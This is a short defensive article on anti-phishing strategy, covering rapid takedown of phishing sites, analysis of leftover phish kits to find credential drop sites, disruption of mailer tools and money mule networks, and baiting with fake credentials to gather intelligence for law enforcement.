Anti-Phishing strategy
To stop modern phishing attacks, they must be made unprofitable. It requires a more comprehensive and aggressive strategy that fully mitigates active phishing attacks, minimizes cybercrime gains and disrupts phishing operations.
Mitigate active phishing attacks — When an attack is launched, it is critical to respond quickly to minimize the immediate impact. The longer the phishing site is active, the greater the risk of stolen credentials. Detect and shut down phish sites entails collecting and processing email and web data from a broad range of relevant sources to ensure sufficient visibility to detect attacks quickly and initiate shut down. It is possible to shut down a phish site within hours of the attack being launched. There is a window of time between when a phishing site is detected and when it can be taken down. During that time, targeted customers are at risk of visiting the phish site and submitting their credentials.
To minimize this risk, confirmed phish sites should be fraud cast to major internet browsers and security products such as anti-virus products, where they can be added to malicious site block lists and prevent users from visiting them.
Minimize cybercrime gains- Launching an attack does not guarantee profits for the cybercriminal. Finding and analyzing the phish kit used in an attack can reveal a great deal of intelligence that can be used to disrupt cybercrime operations and prevent fraud. Phishers will often leave the phish kit on the webserver used in the attack. Many websites are configured with open directory indexing, which makes it easy to view the directory and find the kit. Analysis of the phish kit reveals where the data stolen by the scam is sent, such as drop sites or email accounts. Even with rapid takedown of a phish site, credentials may still be stolen.
However, recovering the credentials can neutralize the risk of them being used for fraud. Once the drop sites or email accounts used in an attack are found, they can be shut down. This prevents the collection of stolen credentials, which are required to profit from phishing attacks. Money mule operations are the last mile of the fraud process. Through investigating aspects of the phishing attack, such as the flow of credentials and where fraudulent transactions are being sent, it’s possible to trace the money mule operations that are involved in monetizing the attack. Action can be taken to disrupt the operations themselves and to also impact the recruitment scams they rely on to find mules.
Disrupt phishing operations — Through investigating phishing attacks, it is possible to find the mailer tool used to launch the phish emails. Mailer programs are rarely custom-built for individual phishing campaigns. Once the program has been identified, steps can be taken to disrupt the distribution and make it more difficult to find online. Baiting is a method of tracing the operational flow of phishing attacks to gather intelligence that can be used to stop attacks and prevent fraud. The process involves creating a set of fake accounts (the bait), injecting credentials for those accounts into phishing sites, and then monitoring legitimate sites for any activity involving those accounts.
This can identify the IP address, user agent, device fingerprints, and other information that can be used to detect other fraudulent activity linked to the same attacker. Analysis of this sort helps pull together a clearer picture of the cybercriminal operation, enabling more aggressive steps to prevent attacks. This analysis also provides information that can be used to find how and where the kit is being distributed. Ultimately, shutting down the site hosting the kit is ideal. The best way to stop phishing attacks is to arrest and prosecute the criminals. However, phishing attacks happen so frequently that simply reporting them to authorities rarely leads to law enforcement action. But if actionable intelligence is provided from investigating the phishing attack and underlying ecosystem, law enforcement action is more likely.
